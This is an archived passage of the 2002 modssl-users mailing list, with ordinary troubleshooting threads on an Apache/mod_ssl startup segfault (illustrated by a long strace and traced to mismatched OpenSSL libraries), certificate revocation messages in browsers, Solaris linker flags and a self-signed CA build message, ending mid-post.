  by 0 with QMQP; 20 Jun 2002 22:06:41 -0000
Date: Thu, 20 Jun 2002 17:06:41 -0500
To: modssl-users@modssl.org
Subject: Apache 1.3.26/mod_ssl-2.8.9-1.3.26 segfault
Message-ID: <20020620170641.A21246@atlas.astro.umn.edu>
Mime-Version: 1.0
Content-Type: multipart/signed; micalg=pgp-md5;
	protocol="application/pgp-signature"; boundary="sm4nu43k4a2Rpi4c"
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: gkuchta@astro.umn.edu
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


--sm4nu43k4a2Rpi4c
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
Content-Transfer-Encoding: quoted-printable

Hi,

Per the recently announced vulnerability in versions of apache < 1.3.26,
I decided to be a happy little prole and update all of my webservices.

Unpacking clean source for apache, mod_ssl and mod_perl-1.26, I upgraded
the packages like I always do:

apply mod_ssl to apache, apply mod_perl to apache, compile apache,
install apache, compile mod_ssl apxs module.

however, this time around, upon running ./apachetel startssl, apache
segfaulted:

275 [HAL:root](/usr/apache):./bin/apachectl startssl
=2E/bin/apachectl: line 184:  4423 Segmentation fault      $HTTPD -DSSL
=2E/bin/apachectl startssl: httpd could not be started

apache starts fine without ssl enabled.

Here's an strace:

=2E..
=2E..
=2E..
[snip]
stat("/usr/apache/conf/access.conf", {st_mode=3DS_IFREG|0600, st_size=3D348,
=2E..}) =3D 0
lstat("/usr/apache/conf/access.conf", {st_mode=3DS_IFREG|0600,
st_size=3D348, ...}) =3D 0
open("/usr/apache/conf/access.conf", O_RDONLY) =3D 3
fstat(3, {st_mode=3DS_IFREG|0600, st_size=3D348, ...}) =3D 0
fstat(3, {st_mode=3DS_IFREG|0600, st_size=3D348, ...}) =3D 0
old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS,
-1, 0) =3D 0x4019f000
read(3, "##\n## access.conf -- Apache HTTP"..., 4096) =3D 348
read(3, "", 4096)                       =3D 0
close(3)                                =3D 0
munmap(0x4019f000, 4096)                =3D 0
brk(0x80f7000)                          =3D 0x80f7000
pipe([3, 4])                            =3D 0
fork()                                  =3D 4494
close(3)                                =3D 0
fcntl(4, F_GETFL)                       =3D 0x1 (flags O_WRONLY)
fstat(4, {st_mode=3DS_IFIFO|0600, st_size=3D0, ...}) =3D 0
old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS,
-1, 0) =3D 0x4019f000
_llseek(4, 0, 0xbfffda00, SEEK_CUR)     =3D -1 ESPIPE (Illegal seek)
dup2(4, 2)                              =3D 2
pipe([3, 5])                            =3D 0
fork()                                  =3D 4495
close(3)                                =3D 0
fcntl(5, F_GETFL)                       =3D 0x1 (flags O_WRONLY)
fstat(5, {st_mode=3DS_IFIFO|0600, st_size=3D0, ...}) =3D 0
old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS,
-1, 0) =3D 0x404ac000
_llseek(5, 0, 0xbfffda00, SEEK_CUR)     =3D -1 ESPIPE (Illegal seek)
open("/var/adm/https.log", O_WRONLY|O_APPEND|O_CREAT, 0666) =3D 3
fcntl(3, F_DUPFD, 15)                   =3D 15
close(3)                                =3D 0
fcntl(15, F_GETFL)                      =3D 0x401 (flags
O_WRONLY|O_APPEND)
fstat(15, {st_mode=3DS_IFREG|0644, st_size=3D11391310, ...}) =3D 0
old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS,
-1, 0) =3D 0x404ad000
_llseek(15, 0, [0], SEEK_CUR)           =3D 0
munmap(0x404ad000, 4096)                =3D 0
time(NULL)                              =3D 1024609805
open("/etc/localtime", O_RDONLY)        =3D 3
read(3, "TZif\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\4\0\0\0\4\0"..., 44)
=3D 44
read(3, "\236\246,\200\237\272\371p\240\206\16\200\241\232\333p"...,
1170) =3D 1170
fstat(3, {st_mode=3DS_IFREG|0644, st_size=3D1262, ...}) =3D 0
old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS,
-1, 0) =3D 0x404ad000
read(3, "\377\377\271\260\1\0\377\377\253\240\0\4\377\377\271\260"...,
4096) =3D 48
close(3)                                =3D 0
munmap(0x404ad000, 4096)                =3D 0
getpid()                                =3D 4493
write(15, "[20/Jun/2002 16:50:05 04493] [in"..., 110) =3D 110
time(NULL)                              =3D 1024609805
getpid()                                =3D 4493
write(15, "[20/Jun/2002 16:50:05 04493] [in"..., 82) =3D 82
time(NULL)                              =3D 1024609805
getpid()                                =3D 4493
write(15, "[20/Jun/2002 16:50:05 04493] [in"..., 72) =3D 72
brk(0x80f8000)                          =3D 0x80f8000
brk(0x80f9000)                          =3D 0x80f9000
brk(0x80fa000)                          =3D 0x80fa000
brk(0x80fb000)                          =3D 0x80fb000
brk(0x80fd000)                          =3D 0x80fd000
brk(0x80fb000)                          =3D 0x80fb000
brk(0x80fd000)                          =3D 0x80fd000
time(NULL)                              =3D 1024609805
getpid()                                =3D 4493
write(15, "[20/Jun/2002 16:50:05 04493] [in"..., 119) =3D 119
open("/etc/ssl/www.cert", O_RDONLY)     =3D 3
fstat(3, {st_mode=3DS_IFREG|0600, st_size=3D1493, ...}) =3D 0
old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS,
-1, 0) =3D 0x404ad000
read(3, "-----BEGIN CERTIFICATE-----\nMIIE"..., 4096) =3D 1493
brk(0x80fe000)                          =3D 0x80fe000
brk(0x80ff000)                          =3D 0x80ff000
close(3)                                =3D 0
munmap(0x404ad000, 4096)                =3D 0
open("/etc/ssl/www.key", O_RDONLY)      =3D 3=20
fstat(3, {st_mode=3DS_IFREG|0600, st_size=3D887, ...}) =3D 0
old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS,
-1, 0) =3D 0x404ad000
read(3, "-----BEGIN RSA PRIVATE KEY-----\n"..., 4096) =3D 887
close(3)                                =3D 0
munmap(0x404ad000, 4096)                =3D 0
time(NULL)                              =3D 1024609805
getpid()                                =3D 4493
time(NULL)                              =3D 1024609805
time(NULL)                              =3D 1024609805
getpid()                                =3D 4493=20
write(15, "[20/Jun/2002 16:50:05 04493] [in"..., 82) =3D 82
getpid()                                =3D 4493
getuid()                                =3D 0
time(NULL)                              =3D 1024609805
open("/dev/urandom", O_RDONLY)          =3D 3
read(3, "$\255\215\30L\315\255\356\3106\305\213\364\f\233\25", 16) =3D 16
close(3)                                =3D 0
time(NULL)                              =3D 1024609805
getpid()                                =3D 4493
write(15, "[20/Jun/2002 16:50:05 04493] [in"..., 97) =3D 97
time([1024609805])                      =3D 1024609805
getpid()                                =3D 4493
time([1024609805])                      =3D 1024609805
getpid()                                =3D 4493
time([1024609805])                      =3D 1024609805
getpid()                                =3D 4493
time([1024609805])                      =3D 1024609805
getpid()                                =3D 4493
time([1024609805])                      =3D 1024609805
getpid()                                =3D 4493
time([1024609805])                      =3D 1024609805
getpid()                                =3D 4493
time([1024609805])                      =3D 1024609805
getpid()                                =3D 4493
time([1024609805])                      =3D 1024609805
getpid()                                =3D 4493
time([1024609805])                      =3D 1024609805
getpid()                                =3D 4493
time([1024609805])                      =3D 1024609805
getpid()                                =3D 4493
time([1024609805])                      =3D 1024609805
getpid()                                =3D 4493
time([1024609805])                      =3D 1024609805
getpid()                                =3D 4493
time([1024609805])                      =3D 1024609805
getpid()                                =3D 4493
time([1024609805])                      =3D 1024609805
getpid()                                =3D 4493
time([1024609805])                      =3D 1024609805
getpid()                                =3D 4493
time([1024609805])                      =3D 1024609805
getpid()                                =3D 4493
time([1024609805])                      =3D 1024609805
getpid()                                =3D 4493
time([1024609805])                      =3D 1024609805=20
getpid()                                =3D 4493
time([1024609805])                      =3D 1024609805
getpid()                                =3D 4493
time([1024609805])                      =3D 1024609805
getpid()                                =3D 4493
time([1024609805])                      =3D 1024609805
getpid()                                =3D 4493
time([1024609805])                      =3D 1024609805
getpid()                                =3D 4493
time([1024609805])                      =3D 1024609805
getpid()                                =3D 4493
time([1024609805])                      =3D 1024609805
getpid()                                =3D 4493
time([1024609805])                      =3D 1024609805
getpid()                                =3D 4493
time([1024609805])                      =3D 1024609805
getpid()                                =3D 4493
time([1024609805])                      =3D 1024609805
getpid()                                =3D 4493
time([1024609805])                      =3D 1024609805
getpid()                                =3D 4493
time([1024609805])                      =3D 1024609805
getpid()                                =3D 4493
time([1024609805])                      =3D 1024609805
getpid()                                =3D 4493
time([1024609805])                      =3D 1024609805
getpid()                                =3D 4493
time([1024609805])                      =3D 1024609805
getpid()                                =3D 4493
time([1024609805])                      =3D 1024609805
getpid()                                =3D 4493
time([1024609805])                      =3D 1024609805
getpid()                                =3D 4493
time([1024609805])                      =3D 1024609805
getpid()                                =3D 4493
time([1024609805])                      =3D 1024609805
getpid()                                =3D 4493
time([1024609805])                      =3D 1024609805
getpid()                                =3D 4493
time([1024609805])                      =3D 1024609805
getpid()                                =3D 4493
time([1024609805])                      =3D 1024609805
getpid()                                =3D 4493
time([1024609805])                      =3D 1024609805
getpid()                                =3D 4493
time([1024609805])                      =3D 1024609805
getpid()                                =3D 4493
time([1024609805])                      =3D 1024609805
getpid()                                =3D 4493
time([1024609805])                      =3D 1024609805
getpid()                                =3D 4493
time([1024609805])                      =3D 1024609805
getpid()                                =3D 4493
time([1024609805])                      =3D 1024609805
getpid()                                =3D 4493
time([1024609805])                      =3D 1024609805
getpid()                                =3D 4493
time([1024609805])                      =3D 1024609805
getpid()                                =3D 4493
time([1024609805])                      =3D 1024609805
getpid()                                =3D 4493
time([1024609805])                      =3D 1024609805
getpid()                                =3D 4493
time([1024609805])                      =3D 1024609805
getpid()                                =3D 4493
time([1024609805])                      =3D 1024609805
getpid()                                =3D 4493
time([1024609805])                      =3D 1024609805
getpid()                                =3D 4493
time([1024609805])                      =3D 1024609805
getpid()                                =3D 4493
time([1024609805])                      =3D 1024609805
getpid()                                =3D 4493
time([1024609805])                      =3D 1024609805
getpid()                                =3D 4493
time([1024609805])                      =3D 1024609805
getpid()                                =3D 4493
time([1024609805])                      =3D 1024609805
getpid()                                =3D 4493
time([1024609805])                      =3D 1024609805
getpid()                                =3D 4493
time([1024609805])                      =3D 1024609805
getpid()                                =3D 4493
time([1024609805])                      =3D 1024609805
getpid()                                =3D 4493

=2E..

repeat this message about 300 more times

=2E..

time([1024609805])                      =3D 1024609805
getpid()                                =3D 4493
time([1024609805])                      =3D 1024609805
getpid()                                =3D 4493
time([1024609805])                      =3D 1024609805
getpid()                                =3D 4493
time(NULL)                              =3D 1024609805
getpid()                                =3D 4493
write(15, "[20/Jun/2002 16:50:05 04493] [in"..., 95) =3D 95
brk(0x8109000)                          =3D 0x8109000
open("./php.ini", O_RDONLY)             =3D -1 ENOENT (No such file or
directory)
open("/usr/lib/php.ini", O_RDONLY)      =3D -1 ENOENT (No such file or
directory)
brk(0x810a000)                          =3D 0x810a000
brk(0x810b000)                          =3D 0x810b000
brk(0x810c000)                          =3D 0x810c000
brk(0x810d000)                          =3D 0x810d000
brk(0x810e000)                          =3D 0x810e000
brk(0x810f000)                          =3D 0x810f000
brk(0x8110000)                          =3D 0x8110000
brk(0x8111000)                          =3D 0x8111000
brk(0x8112000)                          =3D 0x8112000
brk(0x8113000)                          =3D 0x8113000
brk(0x8114000)                          =3D 0x8114000
brk(0x8115000)                          =3D 0x8115000
brk(0x8116000)                          =3D 0x8116000
brk(0x8117000)                          =3D 0x8117000
brk(0x8118000)                          =3D 0x8118000
brk(0x8119000)                          =3D 0x8119000
brk(0x811a000)                          =3D 0x811a000
brk(0x811b000)                          =3D 0x811b000
brk(0x811c000)                          =3D 0x811c000
brk(0x811d000)                          =3D 0x811d000
brk(0x811e000)                          =3D 0x811e000
brk(0x811f000)                          =3D 0x811f000
brk(0x8120000)                          =3D 0x8120000
brk(0x8121000)                          =3D 0x8121000
brk(0x8122000)                          =3D 0x8122000
brk(0x8123000)                          =3D 0x8123000
brk(0x8125000)                          =3D 0x8125000
brk(0x8126000)                          =3D 0x8126000
--- SIGSEGV (Segmentation fault) ---
+++ killed by SIGSEGV +++

configurations:

mod_ssl:
	./configure \
	"--with-apache=3D../apache_1.3.26" \
	"$@"

apache:
	CC=3D"gcc" \
	RANLIB=3D"ranlib" \
	./configure \
	"--with-layout=3DApache" \
	"--prefix=3D/usr/apache" \
	"--enable-module=3Drewrite" \
	"--enable-module=3Dssl" \
	"--enable-module=3Dso" \
	"--enable-shared=3Dssl" \
	"--enable-suexec" \
	"--suexec-caller=3Dwww" \
	"$@"

php4:
	 ./configure  --prefix=3D/usr --with-apxs=3D/usr/apache/bin/apxs \
	 --with-openssl=3D../../openssl-0.9.6c --enable-bcmath \
	 --with-mysql=3D/usr/mysql

gcc version: 2.95.3
libc: libc6
ldd: 1.9.9
ld: 2.11.2
OpenSSL: 0.9.6.c

Let me know if there's anything else I can include to help you out;
I hope I'm just missing something stupid...

sorry if I'm wasting anyone's time.

Much thanks,

Garrett

=09
=09
--=20
Garrett Kuchta [gkuchta[at]astro.umn.edu]
Assistant System Manager
Dept. of Astronomy
University of Minnesota, Twin Cities
http://www.astro.umn.edu/~gkuchta

--sm4nu43k4a2Rpi4c
Content-Type: application/pgp-signature
Content-Disposition: inline

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.2 (GNU/Linux)
Comment: For info see http://www.gnupg.org

iD4DBQE9ElHxGFi+W9iUV88RAlLyAJiWatM4LDFP2vkgIyeQsBFPzWc4AJsHzE/o
YyekAW5/Ur0WlAIWyBLLCg==
=YoYS
-----END PGP SIGNATURE-----

--sm4nu43k4a2Rpi4c--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jun 21 00:13:20 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id AAA11106; Fri, 21 Jun 2002 00:12:44 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from deepthought.cs.virginia.edu id AAA11091; Fri, 21 Jun 2002 00:12:16 +0200 (MET DST)
Received: from localhost (root@localhost)
	by deepthought.cs.virginia.edu (8.11.6/8.11.4) with ESMTP id g5KM9HY12457
	for ; Thu, 20 Jun 2002 18:09:17 -0400
Date: Thu, 20 Jun 2002 18:09:17 -0400 (EDT)
From: Cliff Woolley 
X-X-Sender: root@deepthought.cs.virginia.edu
To: modssl-users@modssl.org
Subject: Re: Apache 1.3.26/mod_ssl-2.8.9-1.3.26 segfault
In-Reply-To: <20020620170641.A21246@atlas.astro.umn.edu>
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Thu, 20 Jun 2002 gkuchta@astro.umn.edu wrote:

> Per the recently announced vulnerability in versions of apache < 1.3.26,
> I decided to be a happy little prole and update all of my webservices.
>
> Unpacking clean source for apache, mod_ssl and mod_perl-1.26, I upgraded
> the packages like I always do:
>
> write(15, "[20/Jun/2002 16:50:05 04493] [in"..., 95) = 95
> brk(0x8109000)                          = 0x8109000
> open("./php.ini", O_RDONLY)             = -1 ENOENT (No such file or
> directory)
> open("/usr/lib/php.ini", O_RDONLY)      = -1 ENOENT (No such file or
> directory)
> brk(0x810a000)                          = 0x810a000
> brk(0x810b000)                          = 0x810b000
> brk(0x810c000)                          = 0x810c000
> brk(0x810d000)                          = 0x810d000
...
> brk(0x8123000)                          = 0x8123000
> brk(0x8125000)                          = 0x8125000
> brk(0x8126000)                          = 0x8126000
> --- SIGSEGV (Segmentation fault) ---
> +++ killed by SIGSEGV +++


Sounds like PHP is borked.  Try building a new copy.

--Cliff

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jun 21 01:24:09 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id BAA16616; Fri, 21 Jun 2002 01:23:38 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from pluto.trimble.co.nz id BAA16577; Fri, 21 Jun 2002 01:22:45 +0200 (MET DST)
Received: (qmail 4821 invoked from network); 21 Jun 2002 11:22:41 +1200
Received: from venus.trimble.co.nz (155.63.248.20)
  by pluto.trimble.co.nz with DES-CBC3-SHA encrypted SMTP; 21 Jun 2002 11:22:41 +1200
Received: (qmail 15602 invoked by uid 403); 21 Jun 2002 11:22:41 +1200
Received: from jhaar@trimble.co.nz by venus.trimble.co.nz by uid 400 with qmail-scanner-1.12 (trophie: 5.500-0829/275/46514. sophie: 2.10/3.57. spamassassin: 2.x. . Clear:. Processed in 2.635211 secs); 20 Jun 2002 23:22:41 -0000
Received: from crom.trimble.co.nz (155.63.248.198)
  by venus.trimble.co.nz with SMTP; 21 Jun 2002 11:22:38 +1200
Received: (qmail 29929 invoked by uid 500); 20 Jun 2002 23:22:37 -0000
Date: Fri, 21 Jun 2002 11:22:37 +1200
From: Jason Haar 
To: modssl-users@modssl.org
Subject: Re: Expired and Revoked Certificates
Message-ID: <20020620232237.GH25669@trimble.co.nz>
References: 
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: 
User-Agent: Mutt/1.3.99i
Organization: Trimble Navigation New Zealand Ltd.
X-Spam-Rating: pluto.trimble.co.nz 1.6.3-jlh 0/2001/A
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Jason Haar 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Thu, Jun 20, 2002 at 10:04:40AM -0500, Mary Peterson wrote:
> I have two issues that I wondered if anyone could assist me with:
> 
> When I test a revoked client certificate against the CRL I get a
> Security Alert Message that says 'The security certificate for this site
> has been revoked.  This site should not be trusted.'

It's a bug with Internet Explorer. I noticed it too.

If you used Mozilla - you'd see it report "your certificate has expired" -
i.e. a correct response.

> Also, when I test an expired client certificate it brings back a 'Page
> Cannot be Displayed' error message.  Does anyone know how I can get it
> to return a 'Your certificate has expired' error message in place of the
> 'Page Cannot be Displayed' message?

Pretty hard. As your cert has expired, then there is no channel over which
to send you that HTML :-) Nope, I'm afraid nothing but the client can give
that information.

-- 
Cheers

Jason Haar
Information Security Manager, Trimble Navigation Ltd.
Phone: +64 3 9635 377 Fax: +64 3 9635 417
PGP Fingerprint: 7A2E 0407 C9A6 CAF6 2B9F 8422 C063 5EBB FE1D 66D1
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jun 21 09:41:39 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id JAA25950; Fri, 21 Jun 2002 09:40:37 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id JAA25864; Fri, 21 Jun 2002 09:40:06 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id C125D4CE79C; Fri, 21 Jun 2002 09:40:04 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 3C9F8286D2; Fri, 21 Jun 2002 09:37:37 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from localhost id JAA23594; Fri, 21 Jun 2002 09:06:28 +0200 (MET DST)
Date: Fri, 21 Jun 2002 09:06:28 +0200 (MET DST)
Message-Id: <200206210706.JAA23594@opensource.ee.ethz.ch>
From: modssl-bugdb@modssl.org
To: modssl-users@modssl.org
Subject: [BugDB] Pb start apacheSSL (PR#722)
Cc: modssl-bugdb@modssl.org
X-Loop: modssl-bugdb@modssl.org
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: modssl-bugdb@modssl.org
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Full_Name: Rebolj 
Version: openssl 9.6a
OS: Solaris
Submission from: (NULL) (171.16.0.60)


when i start it writes


Init: Loading certificate & private key of SSL-aware server
pise.:443[19/Jun/2002 11:24:06 00536] [error] Init: Unable to read server
certificate from file /HOME/webadm/Config/ssl.crt/IntRec.web-riva.cra (OpenSSL
library error follows)
[19/Jun/2002 11:24:06 00536] [error] OpenSSL: error:0D09F007:asn1 encoding
routines:d2i_X509:expecting an asn1 sequence
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jun 21 09:42:16 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id JAA26021; Fri, 21 Jun 2002 09:41:36 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from dice.arl.psu.edu id JAA25938; Fri, 21 Jun 2002 09:40:30 +0200 (MET DST)
Received: from elvis.arl.psu.edu ([146.186.165.126]:48127 "EHLO
	elvis.arl.psu.edu") by elvis.arl.psu.edu with ESMTP
	id ; Fri, 21 Jun 2002 03:35:52 -0400
X-Mailer: exmh version 2.5 07/13/2001 with nmh-1.0.4
X-uri: 	
To: modssl-users@modssl.org
Subject: correctly setting SSL_LDFLAGS under Solaris
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Date: 	Fri, 21 Jun 2002 03:35:52 -0400
From: John D Groenveld 
Message-Id: <20020621073558Z858630-702+116@elvis.arl.psu.edu>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: John D Groenveld 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I haven't dissected the configure process well enough to figure out
who's responsible for setting SSL_LDFLAGS in src/modules/ssl/Makefile
when building mod_ssl + Apache per INSTALL:The flexible APACI-only way
but it would be cool if SSL_LDFLAGS automagically included-R$(SSL_LIBDIR) 
for Solaris and any other OS that supports runtime linker flags.

Thanks,
John
groenveld@acm.org

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jun 21 09:49:11 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id JAA26598; Fri, 21 Jun 2002 09:48:25 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from astro.umn.edu id JAA26528; Fri, 21 Jun 2002 09:47:14 +0200 (MET DST)
From: gkuchta@astro.umn.edu
Received: (qmail 31705 invoked from network); 21 Jun 2002 07:47:08 -0000
Received: from unknown (128.101.221.20)
  by 0 with QMQP; 21 Jun 2002 07:47:08 -0000
Date: Fri, 21 Jun 2002 02:47:07 -0500
To: modssl-users@modssl.org
Subject: Re: Apache 1.3.26/mod_ssl-2.8.9-1.3.26 segfault
Message-ID: <20020621024707.A23655@atlas.astro.umn.edu>
References: <20020620170641.A21246@atlas.astro.umn.edu> 
Mime-Version: 1.0
Content-Type: multipart/signed; micalg=pgp-md5;
	protocol="application/pgp-signature"; boundary="9amGYk9869ThD9tj"
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: ; from jwoolley@apache.org on Thu, Jun 20, 2002 at 06:09:17PM -0400
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: gkuchta@astro.umn.edu
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


--9amGYk9869ThD9tj
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
Content-Transfer-Encoding: quoted-printable

My library update hadn't completely propigated across our network from
the fileserver, so parts of my mish-mash compiled against different
versions of openssl.  All better.  Maybe this will help someone else
down the road.=20

On Thu, Jun 20, 2002 at 06:09:17PM -0400, Cliff Woolley wrote:
> On Thu, 20 Jun 2002 gkuchta@astro.umn.edu wrote:
>=20
> > Per the recently announced vulnerability in versions of apache < 1.3.26,
> > I decided to be a happy little prole and update all of my webservices.
> >
> > Unpacking clean source for apache, mod_ssl and mod_perl-1.26, I upgraded
> > the packages like I always do:
> >
> > write(15, "[20/Jun/2002 16:50:05 04493] [in"..., 95) =3D 95
> > brk(0x8109000)                          =3D 0x8109000
> > open("./php.ini", O_RDONLY)             =3D -1 ENOENT (No such file or
> > directory)
> > open("/usr/lib/php.ini", O_RDONLY)      =3D -1 ENOENT (No such file or
> > directory)
> > brk(0x810a000)                          =3D 0x810a000
> > brk(0x810b000)                          =3D 0x810b000
> > brk(0x810c000)                          =3D 0x810c000
> > brk(0x810d000)                          =3D 0x810d000
> ...
> > brk(0x8123000)                          =3D 0x8123000
> > brk(0x8125000)                          =3D 0x8125000
> > brk(0x8126000)                          =3D 0x8126000
> > --- SIGSEGV (Segmentation fault) ---
> > +++ killed by SIGSEGV +++
>=20
>=20
> Sounds like PHP is borked.  Try building a new copy.
>=20
> --Cliff
>=20

Garrett=20

--=20
Garrett Kuchta [gkuchta[at]astro.umn.edu]
Assistant System Manager
Dept. of Astronomy
University of Minnesota, Twin Cities
http://www.astro.umn.edu/~gkuchta

--9amGYk9869ThD9tj
Content-Type: application/pgp-signature
Content-Disposition: inline

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.2 (GNU/Linux)
Comment: For info see http://www.gnupg.org

iD8DBQE9Etn7GFi+W9iUV88RAiQlAJ9ALrfq8z99wFw08Sd/JIawy92bIACeKG/y
Y8etLQspnvvPwtx5RQr6mic=
=DXLj
-----END PGP SIGNATURE-----

--9amGYk9869ThD9tj--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jun 21 12:01:16 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id MAA05274; Fri, 21 Jun 2002 12:00:52 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from nixpbe.pdb.sbs.de id LAA05176; Fri, 21 Jun 2002 11:59:35 +0200 (MET DST)
Received: from trulli.pdb.fsc.net (ThisAddressDoesNotExist [172.25.96.20] (may be forged))
	by nixpbe.pdb.sbs.de (8.11.2/8.11.2) with ESMTP id g5L9xSI22400
	for ; Fri, 21 Jun 2002 11:59:28 +0200
Received: from deejai2.mch.fsc.net (deejai2.mch.fsc.net [172.25.124.236])
	by trulli.pdb.fsc.net (8.11.6/8.11.6) with ESMTP id g5L9xSN12102
	for ; Fri, 21 Jun 2002 11:59:28 +0200
Received: (from root@localhost)
	by deejai2.mch.fsc.net (8.12.3/8.12.2) id g5L9xTfL023094
	for modssl-users@modssl.org; Fri, 21 Jun 2002 11:59:29 +0200 (CEST)
	(envelope-from martin@deejai2.mch.fsc.net)
Received: from deejai2.mch.fsc.net (localhost6 [IPv6:::1])
	by deejai2.mch.fsc.net (8.12.3/8.12.3) with ESMTP id g5L9xOpF023086
	for ; Fri, 21 Jun 2002 11:59:24 +0200 (CEST)
	(envelope-from martin@deejai2.mch.fsc.net)
Received: (from martin@localhost)
	by deejai2.mch.fsc.net (8.12.3/8.12.3/Submit) id g5L9xOr6023085
	for modssl-users@modssl.org; Fri, 21 Jun 2002 11:59:24 +0200 (CEST)
Date: Fri, 21 Jun 2002 11:59:24 +0200
From: Martin Kraemer 
To: modssl-users@modssl.org
Subject: error 18 at 0 depth lookup (in "make certificate")
Message-ID: <20020621115924.A23026@deejai2.mch.fsc.net>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5.1i
X-Operating-System: FreeBSD 4.6-RC FreeBSD 4.6-RC
X-Organization: Fujitsu Siemens Computers (Muenchen, Germany)
X-Disclaimer: THE COMMENTS CONTAINED IN THIS MESSAGE REFLECT THE VIEWS OF THE  WRITER AND ARE NOT NECESSARILY THE VIEWS OF FUJITSU-SIEMENS COMPUTERS
X-No-Junk-Mail: I do not want to get *any* junk mail.
X-Virus-Scanned: by AMaViS perl-11
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Martin Kraemer 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

When invoking (at the end of the apache+mod_ssl build process)
the suggested "make certificate TYPE=custom", I see an error message
flashing by (``error 18 at 0 depth lookup:self signed certificate'')
followed by a line ``OK''.  Which one is correct? The error
(well, root certificates are always self-signed, aren't they?) or
the "OK"?

> STEP 3: Generating X.509 certificate for CA signed by itself [ca.crt]
> Certificate Version (1 or 3) [3]:
> Signature ok
> subject=/C=DE/ST=Bavaria/L=Munich/O=Fujitsu-Siemens Intranet/OU=Certificate Authority/CN=Apache Web Server Development CA/emailAddress=WebMaster+CA@Apache.mch.fsc.net
> Getting Private key
> Verify: matching certificate & key modulus
> Verify: matching certificate signature
